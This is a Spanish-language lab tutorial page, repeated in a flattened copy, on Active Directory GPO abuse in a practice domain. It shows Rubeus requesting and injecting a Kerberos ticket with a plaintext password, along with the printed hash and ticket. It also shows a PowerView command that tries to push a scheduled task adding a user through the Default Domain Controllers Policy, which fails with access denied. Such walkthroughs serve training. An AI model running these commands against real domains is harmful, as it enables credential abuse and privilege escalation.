Solicitando TGT para el usuario gpowrite.user

Este ejercicio se debe realizar con el usuario gpowrite.user

Primero podemos ejecutar el comando klist:

C:\Users\admin\Desktop>klist

Current LogonId is 0:0x10d6046
Cached Tickets: (2)

#0>     Client: regular.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/SPARTANCYBERSEC.CORP @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/12/2023 20:30:04 (local)
        End Time:   11/13/2023 6:30:04 (local)
        Renew Time: 11/19/2023 20:30:04 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: First-DC.spartancybersec.corp

#1>     Client: regular.user @ SPARTANCYBERSEC.CORP
        Server: ldap/First-DC.spartancybersec.corp/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/12/2023 20:30:04 (local)
        End Time:   11/13/2023 6:30:04 (local)
        Renew Time: 11/19/2023 20:30:04 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: First-DC.spartancybersec.corp

C:\Users\admin\Desktop>Rubeus.exe asktgt /user:gpowrite.user /password:Password@1 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 64FBAE31CC352FC26AF97CBDEF151E03
[*] Building AS-REQ (w/ preauth) for: 'spartancybersec.corp\gpowrite.user'
[*] Using domain controller: 10.0.1.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/spartancybersec.corp
  ServiceRealm             :  SPARTANCYBERSEC.CORP
  UserName                 :  gpowrite.user (NT_PRINCIPAL)
  UserRealm                :  SPARTANCYBERSEC.CORP
  StartTime                :  11/12/2023 8:38:53 PM
  EndTime                  :  11/13/2023 6:38:53 AM
  RenewTill                :  11/19/2023 8:38:53 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  ckGFkkPnXw0mmfXrO9bdDQ==
  ASREP (key)              :  64FBAE31CC352FC26AF97CBDEF151E03

Despues de lo anterior, tendremos una sesion que puede ser validada con klist:

C:\Users\admin\Desktop>klist

Current LogonId is 0:0x10d6046
Cached Tickets: (1)

#0>     Client: gpowrite.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/12/2023 20:38:53 (local)
        End Time:   11/13/2023 6:38:53 (local)
        Renew Time: 11/19/2023 20:38:53 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

Si ejecutamos los siguientes pasos, se obtendra un error:

PS C:\Users\regular.user> New-GPOImmediateTask -Verbose -Force -TaskName 'EvilScript2023' -GPODisplayName 'Default Domain Controllers Policy' -Command cmd -CommandArguments "/c net user abuso.gpo P4ssw0rd /add"
VERBOSE: Get-DomainSearcher search string: LDAP://DC=spartancybersec,DC=corp
VERBOSE: Trying to weaponize GPO: {6AC1786C-016F-11D2-945F-00C04fB984F9}
Set-Content : Network access is denied.
At line:6104 char:28
+ ...  $TaskXML | Set-Content -Encoding ASCII -Path "$TaskPath\ScheduledTas ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (\\spartancybers...eduledTasks.xml:String) [Set-Content], IOException
    + FullyQualifiedErrorId : GetContentWriterIOError,Microsoft.PowerShell.Commands.SetContentCommand

AnteriorUtilizando PowerView SiguienteUtilizando SharpGPOAbuse

Última actualización hace 7 meses

¿Te fue útil?

C:\Users\admin\Desktop>klist Current LogonId is 0:0x10d6046 Cached Tickets: (2) #0> Client: regular.user @ SPARTANCYBERSEC.CORP Server: krbtgt/SPARTANCYBERSEC.CORP @ SPARTANCYBERSEC.CORP KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/12/2023 20:30:04 (local) End Time: 11/13/2023 6:30:04 (local) Renew Time: 11/19/2023 20:30:04 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x1 -> PRIMARY Kdc Called: First-DC.spartancybersec.corp #1> Client: regular.user @ SPARTANCYBERSEC.CORP Server: ldap/First-DC.spartancybersec.corp/spartancybersec.corp @ SPARTANCYBERSEC.CORP KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize Start Time: 11/12/2023 20:30:04 (local) End Time: 11/13/2023 6:30:04 (local) Renew Time: 11/19/2023 20:30:04 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: First-DC.spartancybersec.corp

C:\Users\admin\Desktop>Rubeus.exe asktgt /user:gpowrite.user /password:Password@1 /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.3 [*] Action: Ask TGT [*] Using rc4_hmac hash: 64FBAE31CC352FC26AF97CBDEF151E03 [*] Building AS-REQ (w/ preauth) for: 'spartancybersec.corp\gpowrite.user' [*] Using domain controller: 10.0.1.100:88 [+] TGT request successful! [*] base64(ticket.kirbi): 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 [+] Ticket successfully imported! ServiceName : krbtgt/spartancybersec.corp ServiceRealm : SPARTANCYBERSEC.CORP UserName : gpowrite.user (NT_PRINCIPAL) UserRealm : SPARTANCYBERSEC.CORP StartTime : 11/12/2023 8:38:53 PM EndTime : 11/13/2023 6:38:53 AM RenewTill : 11/19/2023 8:38:53 PM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : ckGFkkPnXw0mmfXrO9bdDQ== ASREP (key) : 64FBAE31CC352FC26AF97CBDEF151E03

C:\Users\admin\Desktop>klist Current LogonId is 0:0x10d6046 Cached Tickets: (1) #0> Client: gpowrite.user @ SPARTANCYBERSEC.CORP Server: krbtgt/spartancybersec.corp @ SPARTANCYBERSEC.CORP KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/12/2023 20:38:53 (local) End Time: 11/13/2023 6:38:53 (local) Renew Time: 11/19/2023 20:38:53 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0x1 -> PRIMARY Kdc Called:

PS C:\Users\regular.user> New-GPOImmediateTask -Verbose -Force -TaskName 'EvilScript2023' -GPODisplayName 'Default Domain Controllers Policy' -Command cmd -CommandArguments "/c net user abuso.gpo P4ssw0rd /add" VERBOSE: Get-DomainSearcher search string: LDAP://DC=spartancybersec,DC=corp VERBOSE: Trying to weaponize GPO: {6AC1786C-016F-11D2-945F-00C04fB984F9} Set-Content : Network access is denied. At line:6104 char:28 + ... $TaskXML | Set-Content -Encoding ASCII -Path "$TaskPath\ScheduledTas ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : WriteError: (\\spartancybers...eduledTasks.xml:String) [Set-Content], IOException + FullyQualifiedErrorId : GetContentWriterIOError,Microsoft.PowerShell.Commands.SetContentCommand